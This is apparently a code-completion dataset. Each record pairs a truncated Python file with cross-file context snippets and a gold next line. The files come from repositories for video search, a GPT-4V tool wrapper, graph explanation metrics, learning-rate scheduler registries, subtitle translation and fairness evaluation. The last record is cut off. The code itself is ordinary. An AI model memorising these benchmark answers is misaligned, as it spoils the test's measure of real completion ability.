replaceable_kwargs = get_kwargs_from_shape(obs_shape, action_shape) | nn_cfg = replace_placeholder_with_args(nn_cfg, **replaceable_kwargs) | 3 | 2023-12-16 16:49:38+00:00 | 2k |
video-db/videodb-python | videodb/search.py | [
{
"identifier": "play_stream",
"path": "videodb/_utils/_video.py",
"snippet": "def play_stream(url: str):\n \"\"\"Play a stream url in the browser/ notebook\n\n :param str url: The url of the stream\n :return: The player url if the stream is opened in the browser or the iframe if the stream is opened in the notebook\n \"\"\"\n player = f\"{PLAYER_URL}?url={url}\"\n opend = web.open(player)\n if not opend:\n try:\n from IPython.display import IFrame\n\n player_width = 800\n player_height = 400\n return IFrame(player, player_width, player_height)\n except ImportError:\n return player\n return player"
},
{
"identifier": "SearchType",
"path": "videodb/_constants.py",
"snippet": "class SearchType:\n semantic = \"semantic\""
},
{
"identifier": "ApiPath",
"path": "videodb/_constants.py",
"snippet": "class ApiPath:\n collection = \"collection\"\n upload = \"upload\"\n video = \"video\"\n stream = \"stream\"\n thumbnail = \"thumbnail\"\n upload_url = \"upload_url\"\n transcription = \"transcription\"\n index = \"index\"\n search = \"search\"\n compile = \"compile\"\n workflow = \"workflow\""
},
{
"identifier": "SemanticSearchDefaultValues",
"path": "videodb/_constants.py",
"snippet": "class SemanticSearchDefaultValues:\n result_threshold = 5\n score_threshold = 0.2"
},
{
"identifier": "SearchError",
"path": "videodb/exceptions.py",
"snippet": "class SearchError(VideodbError):\n \"\"\"\n Raised when a search is invalid.\n \"\"\"\n\n def __init__(self, message):\n super(SearchError, self).__init__(message)"
},
{
"identifier": "Shot",
"path": "videodb/shot.py",
"snippet": "class Shot:\n \"\"\"A shot is a part of a video that contains a specific scene\"\"\"\n\n def __init__(\n self,\n _connection,\n video_id: str,\n video_length: float,\n video_title: str,\n start: float,\n end: float,\n text: Optional[str] = None,\n search_score: Optional[int] = None,\n ) -> None:\n self._connection = _connection\n self.video_id = video_id\n self.video_length = video_length\n self.video_title = video_title\n self.start = start\n self.end = end\n self.text = text\n self.search_score = search_score\n self.stream_url = None\n self.player_url = None\n\n def __repr__(self) -> str:\n return (\n f\"Shot(\"\n f\"video_id={self.video_id}, \"\n f\"video_title={self.video_title}, \"\n f\"start={self.start}, \"\n f\"end={self.end}, \"\n f\"text={self.text}, \"\n f\"search_score={self.search_score}, \"\n f\"stream_url={self.stream_url}, \"\n f\"player_url={self.player_url})\"\n )\n\n def __getitem__(self, key):\n \"\"\"Get an item from the shot object\"\"\"\n return self.__dict__[key]\n\n def generate_stream(self) -> str:\n \"\"\"Generate a stream url for the shot\n\n :return: The stream url\n :rtype: str\n \"\"\"\n\n if self.stream_url:\n return self.stream_url\n else:\n stream_data = self._connection.post(\n path=f\"{ApiPath.video}/{self.video_id}/{ApiPath.stream}\",\n data={\n \"timeline\": [(self.start, self.end)],\n \"length\": self.video_length,\n },\n )\n self.stream_url = stream_data.get(\"stream_url\")\n self.player_url = stream_data.get(\"player_url\")\n return self.stream_url\n\n def play(self) -> str:\n \"\"\"Generate a stream url for the shot and open it in the default browser/ notebook\n\n :return: The stream url\n :rtype: str\n \"\"\"\n self.generate_stream()\n return play_stream(self.stream_url)"
}
] | from abc import ABC, abstractmethod
from videodb._utils._video import play_stream
from videodb._constants import (
SearchType,
ApiPath,
SemanticSearchDefaultValues,
)
from videodb.exceptions import (
SearchError,
)
from typing import Optional, List
from videodb.shot import Shot | 1,478 |
class SearchResult:
def __init__(self, _connection, **kwargs):
self._connection = _connection
self.shots = []
self.stream_url = None
self.player_url = None
self.collection_id = "default"
self._results = kwargs.get("results", [])
self._format_results()
def _format_results(self):
for result in self._results:
self.collection_id = result.get("collection_id")
for doc in result.get("docs"):
self.shots.append(
Shot(
self._connection,
result.get("video_id"),
result.get("length"),
result.get("title"),
doc.get("start"),
doc.get("end"),
doc.get("text"),
doc.get("score"),
)
)
def __repr__(self) -> str:
return (
f"SearchResult("
f"collection_id={self.collection_id}, "
f"stream_url={self.stream_url}, "
f"player_url={self.player_url}, "
f"shots={self.shots})"
)
def get_shots(self) -> List[Shot]:
return self.shots
def compile(self) -> str:
"""Compile the search result shots into a stream url
:raises SearchError: If no shots are found in the search results
:return: The stream url
:rtype: str
"""
if self.stream_url:
return self.stream_url
elif self.shots:
compile_data = self._connection.post(
path=f"{ApiPath.compile}",
data=[
{
"video_id": shot.video_id,
"collection_id": self.collection_id,
"shots": [(shot.start, shot.end)],
}
for shot in self.shots
],
)
self.stream_url = compile_data.get("stream_url")
self.player_url = compile_data.get("player_url")
return self.stream_url
else:
raise SearchError("No shots found in search results to compile")
def play(self) -> str:
"""Generate a stream url for the shot and open it in the default browser
:return: The stream url
:rtype: str
"""
self.compile()
|
class SearchResult:
def __init__(self, _connection, **kwargs):
self._connection = _connection
self.shots = []
self.stream_url = None
self.player_url = None
self.collection_id = "default"
self._results = kwargs.get("results", [])
self._format_results()
def _format_results(self):
for result in self._results:
self.collection_id = result.get("collection_id")
for doc in result.get("docs"):
self.shots.append(
Shot(
self._connection,
result.get("video_id"),
result.get("length"),
result.get("title"),
doc.get("start"),
doc.get("end"),
doc.get("text"),
doc.get("score"),
)
)
def __repr__(self) -> str:
return (
f"SearchResult("
f"collection_id={self.collection_id}, "
f"stream_url={self.stream_url}, "
f"player_url={self.player_url}, "
f"shots={self.shots})"
)
def get_shots(self) -> List[Shot]:
return self.shots
def compile(self) -> str:
"""Compile the search result shots into a stream url
:raises SearchError: If no shots are found in the search results
:return: The stream url
:rtype: str
"""
if self.stream_url:
return self.stream_url
elif self.shots:
compile_data = self._connection.post(
path=f"{ApiPath.compile}",
data=[
{
"video_id": shot.video_id,
"collection_id": self.collection_id,
"shots": [(shot.start, shot.end)],
}
for shot in self.shots
],
)
self.stream_url = compile_data.get("stream_url")
self.player_url = compile_data.get("player_url")
return self.stream_url
else:
raise SearchError("No shots found in search results to compile")
def play(self) -> str:
"""Generate a stream url for the shot and open it in the default browser
:return: The stream url
:rtype: str
"""
self.compile() | return play_stream(self.stream_url) | 0 | 2023-12-18 15:20:04+00:00 | 2k |
IDEA-CCNL/Real-Gemini | real_gemini/tools/gpt4v_tool.py | [
{
"identifier": "load_image",
"path": "real_gemini/utils/image_stacker.py",
"snippet": "def load_image(path):\n image = Image.open(path)\n return image"
},
{
"identifier": "image2base64",
"path": "real_gemini/utils/image_stacker.py",
"snippet": "def image2base64(image):\n buffered = BytesIO()\n image.save(buffered, format=\"PNG\")\n return base64.b64encode(buffered.getvalue()).decode()"
}
] | import os
import json
from typing import List
from langchain.memory import ChatMessageHistory
from langchain.chat_models import ChatOpenAI
from langchain_core.messages import HumanMessage, SystemMessage
from ..utils.image_stacker import load_image, image2base64 | 727 | #encoding=utf8
_OPEN_AI_SYSTEM_PROMPT = """the user is dictating with his or her camera on.
they are showing you things visually and giving you text prompts.
be very brief and concise.
be extremely concise. this is very important for my career. do not ramble.
do not comment on what the person is wearing or where they are sitting or their background.
focus on their gestures and the question they ask you.
do not mention that there are a sequence of pictures. focus only on the image or the images necessary to answer the question.
don't comment if they are smiling. don't comment if they are frowning. just focus on what they're asking.
"""
class GPT4VTool(object):
_name_ = "GPT-4-Vision"
_description_ = "这个工具是GPT for vision的调用接口。用于图像到文本的理解。本工具的输入是一段文本指令和一张或者多张图片,请注意,工具的输入由一个JSON字符串组成,json包括两个key,question和image_input。question表示文本指令,image_input表示图片路径或存放图片的目录。例如:{{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}。A wrapper around OpenAI GPT4V API. Useful for image-to-text understanding when you need to generate text from some images and a text description. The input of this tool is a text prompt and one or more images. Please note, the input of the tool consists of a JSON string, the json includes two keys, question and image_input. The question represents text instructions, and image_input represents the image path or the directory where the images are stored. For example: {{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}."
_return_direct_ = False
def __init__(self):
self._gpt4v = ChatOpenAI(
model="gpt-4-vision-preview",
max_tokens=256)
self.max_dialog_turn = 3
self.history = ChatMessageHistory()
self.history.add_message(
SystemMessage(
content=[
{"type": "text", "text": _OPEN_AI_SYSTEM_PROMPT}
]
)
)
def inference(self, input_str: str):
input_dict = json.loads(input_str)
image_path = input_dict["image_input"]
if os.path.isdir(image_path):
image_paths = [
os.path.join(image_path, path) for path in os.listdir(image_path)]
else:
image_paths = [image_path]
base64_images = []
for image_path in image_paths:
| #encoding=utf8
_OPEN_AI_SYSTEM_PROMPT = """the user is dictating with his or her camera on.
they are showing you things visually and giving you text prompts.
be very brief and concise.
be extremely concise. this is very important for my career. do not ramble.
do not comment on what the person is wearing or where they are sitting or their background.
focus on their gestures and the question they ask you.
do not mention that there are a sequence of pictures. focus only on the image or the images necessary to answer the question.
don't comment if they are smiling. don't comment if they are frowning. just focus on what they're asking.
"""
class GPT4VTool(object):
_name_ = "GPT-4-Vision"
_description_ = "这个工具是GPT for vision的调用接口。用于图像到文本的理解。本工具的输入是一段文本指令和一张或者多张图片,请注意,工具的输入由一个JSON字符串组成,json包括两个key,question和image_input。question表示文本指令,image_input表示图片路径或存放图片的目录。例如:{{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}。A wrapper around OpenAI GPT4V API. Useful for image-to-text understanding when you need to generate text from some images and a text description. The input of this tool is a text prompt and one or more images. Please note, the input of the tool consists of a JSON string, the json includes two keys, question and image_input. The question represents text instructions, and image_input represents the image path or the directory where the images are stored. For example: {{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}."
_return_direct_ = False
def __init__(self):
self._gpt4v = ChatOpenAI(
model="gpt-4-vision-preview",
max_tokens=256)
self.max_dialog_turn = 3
self.history = ChatMessageHistory()
self.history.add_message(
SystemMessage(
content=[
{"type": "text", "text": _OPEN_AI_SYSTEM_PROMPT}
]
)
)
def inference(self, input_str: str):
input_dict = json.loads(input_str)
image_path = input_dict["image_input"]
if os.path.isdir(image_path):
image_paths = [
os.path.join(image_path, path) for path in os.listdir(image_path)]
else:
image_paths = [image_path]
base64_images = []
for image_path in image_paths: | base64_image = image2base64(load_image(image_path)) | 1 | 2023-12-15 04:09:37+00:00 | 2k |
aiim-research/GRETEL | src/evaluation/evaluation_metric_smiles_levenshtein.py | [
{
"identifier": "EvaluationMetric",
"path": "src/evaluation/evaluation_metric_base.py",
"snippet": "class EvaluationMetric(ABC):\n\n def __init__(self, config_dict=None) -> None:\n super().__init__()\n self._name = 'abstract_metric'\n self._config_dict = config_dict\n self._special = False #TODO: this must be removed in the future just to manage Runtime NOW QUICKFIX \n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, new_name):\n self._name = new_name\n\n @abstractmethod\n def evaluate(self, instance_1 , instance_2 , oracle : Oracle=None, explainer : Explainer=None, dataset = None):\n pass\n\n def aggregate(self,measure_list):\n return np.mean(measure_list),np.std(measure_list)"
},
{
"identifier": "Oracle",
"path": "src/core/oracle_base.py",
"snippet": "class Oracle(Trainable,metaclass=ABCMeta):\n def __init__(self, context:Context, local_config) -> None:\n super().__init__(context, local_config)\n self._call_counter = 0\n \n @final\n def predict(self, data_instance):\n \"\"\"predicts the label of a given data instance\n -------------\n INPUT:\n data_instance : The instance whose class is going to be predicted \n -------------\n OUTPUT:\n The predicted label for the data instance\n \"\"\"\n self._call_counter += 1\n\n return self._real_predict(data_instance)\n\n @final\n def predict_proba(self, data_instance):\n \"\"\"predicts the probability estimates for a given data instance\n -------------\n INPUT:\n data_instance : The instance whose class is going to be predicted \n -------------\n OUTPUT:\n The predicted probability estimates for the data instance\n \"\"\"\n self._call_counter += 1\n\n return self._real_predict_proba(data_instance)\n\n @final\n def get_calls_count(self):\n return self._call_counter\n \n @final\n def reset_call_count(self):\n self._call_counter = 0 \n\n @final\n def predict_list(self, dataset: Dataset, fold_id=0):\n sptest = dataset.get_split_indices()[fold_id]['test']\n result = [self.predict(dataset.get_instance(i)) for i in sptest]\n return result\n \n '''@abstractmethod'''#TODO: need to be reactivated and implemented. May can be removed accordingly to Mario and GRETEL philosphy\n def evaluate(self, dataset: Dataset, fold_id=0):\n pass\n \n @abstractmethod\n def _real_predict(self, data_instance):\n pass\n \n @abstractmethod\n def _real_predict_proba(self, data_instance):\n pass"
},
{
"identifier": "Explainer",
"path": "src/core/explainer_base.py",
"snippet": "class Explainer(Configurable, metaclass=ABCMeta):\n \n def __init__(self, context: Context, local_config):\n self.dataset = retake_dataset(local_config)\n self.oracle = retake_oracle(local_config)\n super().__init__(context, local_config)\n \n\n @abstractmethod\n def explain(self, instance):\n pass\n\n def check_configuration(self):\n super().check_configuration()\n self.local_config['parameters']['fold_id'] = self.local_config['parameters'].get('fold_id', -1)\n self.fold_id = self.local_config['parameters']['fold_id'] "
}
] | from functools import lru_cache
from src.evaluation.evaluation_metric_base import EvaluationMetric
from src.core.oracle_base import Oracle
from src.core.explainer_base import Explainer | 960 |
class SmilesLevenshteinMetric(EvaluationMetric):
"""Provides the ratio between the number of features modified to obtain the counterfactual example
and the number of features in the original instance. Only considers structural features.
"""
def __init__(self, config_dict=None) -> None:
super().__init__(config_dict)
self._name = 'Smiles-Levenshtein'
|
class SmilesLevenshteinMetric(EvaluationMetric):
"""Provides the ratio between the number of features modified to obtain the counterfactual example
and the number of features in the original instance. Only considers structural features.
"""
def __init__(self, config_dict=None) -> None:
super().__init__(config_dict)
self._name = 'Smiles-Levenshtein'
| def evaluate(self, instance_1 , instance_2 , oracle : Oracle=None, explainer : Explainer=None, dataset = None): | 1 | 2023-12-15 16:34:16+00:00 | 2k |
modelscope/scepter | scepter/modules/opt/lr_schedulers/registry.py | [
{
"identifier": "Registry",
"path": "scepter/modules/utils/registry.py",
"snippet": "class Registry(object):\n \"\"\" A registry maps key to classes or functions.\n\n Example:\n # >>> MODELS = Registry('MODELS')\n # >>> @MODELS.register_class()\n # >>> class ResNet(object):\n # >>> pass\n # >>> config = Config(cfg_dict = {\"NAME\":\"ResNet\"})\n # >>> resnet = MODELS.build(config)\n # >>>\n # >>> import torchvision\n # >>> @MODELS.register_function(\"InceptionV3\")\n # >>> def get_inception_v3(pretrained=False, progress=True):\n # >>> return torchvision.model.inception_v3(pretrained=pretrained, progress=progress)\n # >>> config = Config(cfg_dict = {\"NAME\":\"InceptionV3\"})\n # >>> inception_v3 = MODELS.build(config)\n\n Args:\n name (str): Registry name.\n build_func (func, None): Instance construct function. Default is build_from_config.\n allow_types (tuple): Indicates how to construct the instance, by constructing class or invoking function.\n \"\"\"\n def __init__(self,\n name,\n build_func=None,\n common_para=None,\n allow_types=('class', 'function')):\n self.name = name\n self.allow_types = allow_types\n self.class_map = {}\n self.func_map = {}\n self.common_para = common_para\n self.build_func = build_func or build_from_config\n REGISTRY_LIST.append(self)\n\n def get(self, req_type):\n return self.class_map.get(req_type) or self.func_map.get(req_type)\n\n def build(self, cfg, logger=None, *args, **kwargs):\n return self.build_func(cfg,\n registry=self,\n logger=logger,\n *args,\n **kwargs)\n\n def register_class(self, name=None):\n def _register(cls):\n if not inspect.isclass(cls):\n raise TypeError(f'Module must be type class, got {type(cls)}')\n if 'class' not in self.allow_types:\n raise TypeError(\n f'Register {self.name} only allows type {self.allow_types}, got class'\n )\n module_name = name or cls.__name__\n if module_name in self.class_map:\n warnings.warn(\n f'Class {module_name} already registered by {self.class_map[module_name]}, '\n f'will be replaced by {cls}')\n self.class_map[module_name] = cls\n return cls\n\n return _register\n\n def register_function(self, name=None):\n def _register(func):\n if not inspect.isfunction(func):\n raise TypeError(\n f'Registry must be type function, got {type(func)}')\n if 'function' not in self.allow_types:\n raise TypeError(\n f'Registry {self.name} only allows type {self.allow_types}, got function'\n )\n func_name = name or func.__name__\n if func_name in self.class_map:\n warnings.warn(\n f'Function {func_name} already registered by {self.func_map[func_name]}, '\n f'will be replaced by {func}')\n self.func_map[func_name] = func\n return func\n\n return _register\n\n def _list(self):\n keys = sorted(list(self.class_map.keys()) + list(self.func_map.keys()))\n descriptions = []\n for key in keys:\n if key in self.class_map:\n descriptions.append(f'{key}: {self.class_map[key]}')\n else:\n descriptions.append(\n f\"{key}: <function '{self.func_map[key].__module__}.{self.func_map[key].__name__}'>\"\n )\n return '\\n'.join(descriptions)\n\n def __repr__(self):\n description = self._list()\n description = '\\n'.join(['\\t' + s for s in description.split('\\n')])\n return f'{self.__class__.__name__} [{self.name}], \\n' + description\n\n def get_config_template(self, name):\n common_yaml_str = ''\n if self.common_para is not None:\n common_yaml_str += 'The following para are used for this class.\\n'\n common_yaml_str += dict_to_yaml('common_parameter',\n __class__.__name__,\n self.common_para,\n set_name=False)\n\n req_type_entry = self.get(name)\n if req_type_entry is None:\n raise KeyError(f'{name} not found in {self.name} registry')\n if inspect.isclass(req_type_entry):\n return req_type_entry.get_config_template() + common_yaml_str\n elif inspect.isfunction(req_type_entry):\n return '{} is a function!'.format(name)\n else:\n return 'Unsurport object type!'"
},
{
"identifier": "deep_copy",
"path": "scepter/modules/utils/registry.py",
"snippet": "def deep_copy(obj):\n return obj"
}
] | import inspect
from scepter.modules.utils.registry import Registry, deep_copy
from scepter.modules.utils.config import Config | 1,272 | # -*- coding: utf-8 -*-
# Copyright (c) Alibaba, Inc. and its affiliates.
def build_lr_scheduler(cfg, registry, logger=None, *args, **kwargs):
if not isinstance(cfg, Config):
raise TypeError(f'config must be type dict, got {type(cfg)}')
if not cfg.have('NAME'):
raise KeyError(f'config must contain key NAME, got {cfg}')
| # -*- coding: utf-8 -*-
# Copyright (c) Alibaba, Inc. and its affiliates.
def build_lr_scheduler(cfg, registry, logger=None, *args, **kwargs):
if not isinstance(cfg, Config):
raise TypeError(f'config must be type dict, got {type(cfg)}')
if not cfg.have('NAME'):
raise KeyError(f'config must contain key NAME, got {cfg}') | if not isinstance(registry, Registry): | 0 | 2023-12-21 02:01:48+00:00 | 2k |
pigeonai-org/ViDove | src/translators/translation.py | [
{
"identifier": "LLM_task",
"path": "src/translators/LLM_task.py",
"snippet": "def LLM_task(model_name, input, task, temp = 0.15):\n \"\"\"\n Translates input sentence with desired LLM.\n\n :param model_name: The name of the translation model to be used.\n :param input: Sentence for translation.\n :param task: Prompt.\n :param temp: Model temperature.\n \"\"\"\n if model_name in [\"gpt-3.5-turbo\", \"gpt-4\", \"gpt-4-1106-preview\"]:\n response = openai.ChatCompletion.create(\n model=model_name,\n messages=[\n {\"role\": \"system\",\"content\": task},\n {\"role\": \"user\", \"content\": input}\n ],\n temperature=temp\n )\n return response['choices'][0]['message']['content'].strip()\n # Other LLM not implemented\n else:\n raise NotImplementedError"
},
{
"identifier": "split_script",
"path": "src/srt_util/srt.py",
"snippet": "def split_script(script_in, chunk_size=1000):\n script_split = script_in.split('\\n\\n')\n script_arr = []\n range_arr = []\n start = 1\n end = 0\n script = \"\"\n for sentence in script_split:\n if len(script) + len(sentence) + 1 <= chunk_size:\n script += sentence + '\\n\\n'\n end += 1\n else:\n range_arr.append((start, end))\n start = end + 1\n end += 1\n script_arr.append(script.strip())\n script = sentence + '\\n\\n'\n if script.strip():\n script_arr.append(script.strip())\n range_arr.append((start, len(script_split) - 1))\n\n assert len(script_arr) == len(range_arr)\n return script_arr, range_arr"
}
] | from os import getenv
from time import sleep
from tqdm import tqdm
from .LLM_task import LLM_task
from src.srt_util.srt import split_script
import logging | 1,289 |
def get_translation(srt, model, video_name, prompt = None, chunk_size = 1000):
# print(srt.get_source_only())
script_arr, range_arr = split_script(srt.get_source_only(),chunk_size)
translate(srt, script_arr, range_arr, model, video_name, task=prompt)
pass
def check_translation(sentence, translation):
"""
check merge sentence issue from openai translation
"""
sentence_count = sentence.count('\n\n') + 1
translation_count = translation.count('\n\n') + 1
if sentence_count != translation_count:
return False
else:
return True
# TODO{david}: prompts selector
def prompt_selector(src_lang, tgt_lang, domain):
language_map = {
"EN": "English",
"ZH": "Chinese",
"ES": "Spanish",
"FR": "France",
"DE": "Germany",
"RU": "Russian",
"JA": "Japanese",
"AR": "Arabic",
}
try:
src_lang = language_map[src_lang]
tgt_lang = language_map[tgt_lang]
except:
print("Unsupported language, is your abbreviation correct?")
logging.info("Unsupported language detected")
prompt = f"""
you are a translation assistant, your job is to translate a video in domain of {domain} from {src_lang} to {tgt_lang},
you will be provided with a segement in {src_lang} parsed by line, where your translation text should keep the original
meaning and the number of lines.
"""
return prompt
def translate(srt, script_arr, range_arr, model_name, video_name=None, attempts_count=5, task=None, temp = 0.15):
"""
Translates the given script array into another language using the chatgpt and writes to the SRT file.
This function takes a script array, a range array, a model name, a video name, and a video link as input. It iterates
through sentences and range in the script and range arrays. If the translation check fails for five times, the function
will attempt to resolve merge sentence issues and split the sentence into smaller tokens for a better translation.
:param srt: An instance of the Subtitle class representing the SRT file.
:param script_arr: A list of strings representing the original script sentences to be translated.
:param range_arr: A list of tuples representing the start and end positions of sentences in the script.
:param model_name: The name of the translation model to be used.
:param video_name: The name of the video.
:param attempts_count: Number of attemps of failures for unmatched sentences.
:param task: Prompt.
:param temp: Model temperature.
"""
if input is None:
raise Exception("Warning! No Input have passed to LLM!")
if task is None:
task = "你是一个翻译助理,你的任务是翻译视频,你会被提供一个按行分割的英文段落,你需要在保证句意和行数的情况下输出翻译后的文本。"
logging.info(f"translation prompt: {task}")
previous_length = 0
for sentence, range_ in tqdm(zip(script_arr, range_arr)):
# update the range based on previous length
range_ = (range_[0] + previous_length, range_[1] + previous_length)
# using chatgpt model
print(f"now translating sentences {range_}")
logging.info(f"now translating sentences {range_}")
flag = True
while flag:
flag = False
try:
|
def get_translation(srt, model, video_name, prompt = None, chunk_size = 1000):
# print(srt.get_source_only())
script_arr, range_arr = split_script(srt.get_source_only(),chunk_size)
translate(srt, script_arr, range_arr, model, video_name, task=prompt)
pass
def check_translation(sentence, translation):
"""
check merge sentence issue from openai translation
"""
sentence_count = sentence.count('\n\n') + 1
translation_count = translation.count('\n\n') + 1
if sentence_count != translation_count:
return False
else:
return True
# TODO{david}: prompts selector
def prompt_selector(src_lang, tgt_lang, domain):
language_map = {
"EN": "English",
"ZH": "Chinese",
"ES": "Spanish",
"FR": "France",
"DE": "Germany",
"RU": "Russian",
"JA": "Japanese",
"AR": "Arabic",
}
try:
src_lang = language_map[src_lang]
tgt_lang = language_map[tgt_lang]
except:
print("Unsupported language, is your abbreviation correct?")
logging.info("Unsupported language detected")
prompt = f"""
you are a translation assistant, your job is to translate a video in domain of {domain} from {src_lang} to {tgt_lang},
you will be provided with a segement in {src_lang} parsed by line, where your translation text should keep the original
meaning and the number of lines.
"""
return prompt
def translate(srt, script_arr, range_arr, model_name, video_name=None, attempts_count=5, task=None, temp = 0.15):
"""
Translates the given script array into another language using the chatgpt and writes to the SRT file.
This function takes a script array, a range array, a model name, a video name, and a video link as input. It iterates
through sentences and range in the script and range arrays. If the translation check fails for five times, the function
will attempt to resolve merge sentence issues and split the sentence into smaller tokens for a better translation.
:param srt: An instance of the Subtitle class representing the SRT file.
:param script_arr: A list of strings representing the original script sentences to be translated.
:param range_arr: A list of tuples representing the start and end positions of sentences in the script.
:param model_name: The name of the translation model to be used.
:param video_name: The name of the video.
:param attempts_count: Number of attemps of failures for unmatched sentences.
:param task: Prompt.
:param temp: Model temperature.
"""
if input is None:
raise Exception("Warning! No Input have passed to LLM!")
if task is None:
task = "你是一个翻译助理,你的任务是翻译视频,你会被提供一个按行分割的英文段落,你需要在保证句意和行数的情况下输出翻译后的文本。"
logging.info(f"translation prompt: {task}")
previous_length = 0
for sentence, range_ in tqdm(zip(script_arr, range_arr)):
# update the range based on previous length
range_ = (range_[0] + previous_length, range_[1] + previous_length)
# using chatgpt model
print(f"now translating sentences {range_}")
logging.info(f"now translating sentences {range_}")
flag = True
while flag:
flag = False
try: | translate = LLM_task(model_name, sentence, task, temp) | 0 | 2023-12-20 01:46:47+00:00 | 2k |
YyzHarry/shortcut-ood-fairness | utils/lin_eval.py | [
{
"identifier": "binary_metrics",
"path": "utils/eval_helper.py",
"snippet": "def binary_metrics(targets, preds, label_set=[0, 1], suffix='', return_arrays=False):\n if len(targets) == 0:\n return {}\n\n res = {\n 'accuracy': accuracy_score(targets, preds),\n 'n_samples': len(targets)\n }\n\n if len(label_set) == 2:\n CM = confusion_matrix(targets, preds, labels=label_set)\n\n res['TN'] = CM[0][0].item()\n res['FN'] = CM[1][0].item()\n res['TP'] = CM[1][1].item()\n res['FP'] = CM[0][1].item()\n\n res['error'] = res['FN'] + res['FP']\n\n if res['TP'] + res['FN'] == 0:\n res['TPR'] = 0\n res['FNR'] = 1\n else:\n res['TPR'] = res['TP']/(res['TP']+res['FN'])\n res['FNR'] = res['FN']/(res['TP']+res['FN'])\n\n if res['FP'] + res['TN'] == 0:\n res['FPR'] = 1\n res['TNR'] = 0\n else:\n res['FPR'] = res['FP']/(res['FP']+res['TN'])\n res['TNR'] = res['TN']/(res['FP']+res['TN'])\n\n res['pred_prevalence'] = (res['TP'] + res['FP']) / res['n_samples']\n res['prevalence'] = (res['TP'] + res['FN']) / res['n_samples']\n else:\n CM = confusion_matrix(targets, preds, labels=label_set)\n res['TPR'] = recall_score(targets, preds, labels=label_set, average='macro', zero_division=0.)\n\n if len(np.unique(targets)) > 1:\n res['balanced_acc'] = balanced_accuracy_score(targets, preds)\n\n if return_arrays:\n res['targets'] = targets\n res['preds'] = preds\n\n return {f\"{i}{suffix}\": res[i] for i in res}"
},
{
"identifier": "prob_metrics",
"path": "utils/eval_helper.py",
"snippet": "def prob_metrics(targets, preds, label_set, return_arrays=False):\n if len(targets) == 0:\n return {}\n\n res = {\n 'BCE': log_loss(targets, preds, eps=1e-6, labels=label_set),\n 'ECE': netcal.metrics.ECE().measure(preds, targets)\n }\n\n if len(set(targets)) > 2:\n # happens when you predict a class, but there are no samples with that class in the dataset\n try:\n res['AUROC'] = roc_auc_score(targets, preds, multi_class='ovr', labels=label_set)\n except:\n res['AUROC'] = roc_auc_score(targets, preds, multi_class='ovo', labels=label_set)\n elif len(set(targets)) == 2:\n res['AUROC'] = roc_auc_score(targets, preds, labels=label_set)\n elif len(set(targets)) == 1:\n res['AUROC'] = None\n\n if len(set(targets)) == 2:\n # res['ROC_curve'] = roc_curve(targets, preds)\n res['AUPRC'] = average_precision_score(targets, preds, average='macro')\n res['brier'] = brier_score_loss(targets, preds)\n res['mean_pred_1'] = preds[targets == 1].mean()\n res['mean_pred_0'] = preds[targets == 0].mean()\n\n if return_arrays:\n res['targets'] = targets\n res['preds'] = preds\n\n return res"
}
] | import numpy as np
import torch
from utils.eval_helper import binary_metrics, prob_metrics
from sklearn.model_selection import GridSearchCV, PredefinedSplit
from sklearn.pipeline import Pipeline
from sklearn.linear_model import LogisticRegression
from sklearn.base import clone
from sklearn.metrics import roc_auc_score
from sklearn.ensemble import RandomForestClassifier | 1,460 |
def get_representations(algorithm, loader, device):
ys, atts, zs = [], [], []
algorithm.eval()
with torch.no_grad():
for _, x, y, a in loader:
z = algorithm.return_feats(x.to(device)).detach().cpu().numpy()
zs.append(z)
ys.append(y)
atts.append(a)
return np.concatenate(zs, axis=0), np.concatenate(atts, axis=0), np.concatenate(ys, axis=0)
def fit_model(train_X, train_Y, val_X, val_Y, test_X, test_Y, model_type='lr'):
if model_type == 'lr':
pipe = Pipeline(steps=[
('model', LogisticRegression(random_state=42, n_jobs=-1))
])
param_grid = {
'model__C': 10**np.linspace(-5, 1, 10)
}
elif model_type == 'rf':
pipe = Pipeline(steps=[
('model', RandomForestClassifier(random_state=42, n_jobs=-1))
# ('model', XGBClassifier(random_state=42, n_jobs=-1))
])
param_grid = {
'model__max_depth': list(range(1, 7))
}
else:
raise NotImplementedError
pds = PredefinedSplit(test_fold=np.concatenate([np.ones((len(train_X),))*-1, np.zeros((len(val_X),))]))
cv_lr = (GridSearchCV(pipe, param_grid, refit=False, cv=pds, scoring='roc_auc_ovr', verbose=10, n_jobs=-1).fit(
np.concatenate((train_X, val_X)), np.concatenate((train_Y, val_Y))))
pipe = clone(
clone(pipe).set_params(**cv_lr.best_params_)
)
pipe = pipe.fit(train_X, train_Y)
label_set = np.sort(np.unique(train_Y))
res = {}
for sset, X, Y in zip(['va', 'te'], [val_X, test_X], [val_Y, test_Y]):
preds = pipe.predict_proba(X)
if len(label_set) == 2:
preds = preds[:, 1]
preds_rounded = preds >= 0.5
else:
preds_rounded = preds.argmax(1)
|
def get_representations(algorithm, loader, device):
ys, atts, zs = [], [], []
algorithm.eval()
with torch.no_grad():
for _, x, y, a in loader:
z = algorithm.return_feats(x.to(device)).detach().cpu().numpy()
zs.append(z)
ys.append(y)
atts.append(a)
return np.concatenate(zs, axis=0), np.concatenate(atts, axis=0), np.concatenate(ys, axis=0)
def fit_model(train_X, train_Y, val_X, val_Y, test_X, test_Y, model_type='lr'):
if model_type == 'lr':
pipe = Pipeline(steps=[
('model', LogisticRegression(random_state=42, n_jobs=-1))
])
param_grid = {
'model__C': 10**np.linspace(-5, 1, 10)
}
elif model_type == 'rf':
pipe = Pipeline(steps=[
('model', RandomForestClassifier(random_state=42, n_jobs=-1))
# ('model', XGBClassifier(random_state=42, n_jobs=-1))
])
param_grid = {
'model__max_depth': list(range(1, 7))
}
else:
raise NotImplementedError
pds = PredefinedSplit(test_fold=np.concatenate([np.ones((len(train_X),))*-1, np.zeros((len(val_X),))]))
cv_lr = (GridSearchCV(pipe, param_grid, refit=False, cv=pds, scoring='roc_auc_ovr', verbose=10, n_jobs=-1).fit(
np.concatenate((train_X, val_X)), np.concatenate((train_Y, val_Y))))
pipe = clone(
clone(pipe).set_params(**cv_lr.best_params_)
)
pipe = pipe.fit(train_X, train_Y)
label_set = np.sort(np.unique(train_Y))
res = {}
for sset, X, Y in zip(['va', 'te'], [val_X, test_X], [val_Y, test_Y]):
preds = pipe.predict_proba(X)
if len(label_set) == 2:
preds = preds[:, 1]
preds_rounded = preds >= 0.5
else:
